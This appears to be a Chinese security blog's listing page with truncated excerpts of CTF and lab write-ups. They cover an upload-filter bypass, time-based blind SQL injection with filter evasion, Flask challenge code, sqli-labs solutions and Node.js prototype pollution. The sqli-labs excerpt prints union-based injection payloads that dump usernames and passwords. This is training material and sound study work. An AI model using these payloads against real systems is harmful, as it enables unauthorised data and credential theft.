蜀道山2024wp
奶龙牌WAF拿到附件 不准上传后缀为ph和hta的文件 并且对文件大小有限制 代码关键处: move_uploaded_file 函数定义和用法:12move_uploaded_file() 函数把上传的文件移动到新位置。如果成功该函数返回 TRUE,如果失败则返回 FALSE。 语法:123move_uploaded_file(file,newloc)file:必需。规定要移动的文件。newloc:必需。规定文件的新位置。 提示12注释:该函数仅用于通过 HTTP POST...
XYCTF2025-WEB WP
前言:由于笔者能力有限,只写了自己能力以内的题的WPez_puzzlejs代码游戏 禁了一些常用快捷键 我的做法是将所有代码拉下来 自己本地用phpstudy起了一个服务 具体改源代码逻辑 1if (G < yw4) 改为 if (G > yw4) 这个是判断时间是否小于两秒的逻辑 把其改为大于 自己玩一遍拼图就ok了 flag{Y0u__aRe_a_mAsteR_of_PUzZL!!@!!~!} ezsql(手动滑稽)sql毋庸置疑 注入点是usrname 闭合时单引号 fuzz一下发现过滤了,空格等 首先空格使用%09绕过 因为,被ban了的原因 很多语句都不可以用 使用 case when语句来进行时间盲注 语句构造: !!!请注意:python里盲注要把%09改为\t 因为request库会将\t编码为%09 爆数据库...
NSSCTF Round30 Basic双人组队赛
hack_the_world!12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152from flask import Flask, request, render_template,render_template_string, url_for, sessionimport timeimport osapp = Flask(__name__)app.secret_key = 'NSS'FILTER_KEYWORDS = ['Ciallo~(∠・ω <)⌒★']def contains_forbidden_keywords(complaint): for keyword in FILTER_KEYWORDS: if keyword.lower() in complaint: return True return...
Sql-labs部分题解
level-1字符型 ‘注入 1-1' union select 1,2,group_concat(username,id,password) from users--+ 唯一注意点就是查询时要用-1 因为我们要得到union后的结果 level-2数字型注入 后面过程和level-1一样 1-1 union select 1,2,group_concat(username,id,password) from users--+ level-3输入1’ 回显中有个) 说明sql语句里有() 考虑加入) 与前面的( 构成闭合 1’ ) –+构造闭合成功 后面与level-1 level-2 一样 1-1') union select 1,2,group_concat(username,id,password) from users--+ level-4双引号和括号构造闭合 1-1") union select 1,2,group_concat(username,id,password) from users--+ level-51’ –+...
Node.js原型链污染学习
原型链污染学习链接:https://www.leavesongs.com/PENETRATION/javascript-prototype-pollution-attack.html?page=1 node.jsjs创建对象的形式1.普通创建12var name={name:'sauy','age':'19'}var person={} 2.构造函数方法创建12345678910function person(){ this.name='sauy'; this.test=function (){ return 23333; }}person.prototype.a=3;web=new person();console.log(web.test());console.log(web.a) 3.通过object创建123var a=new...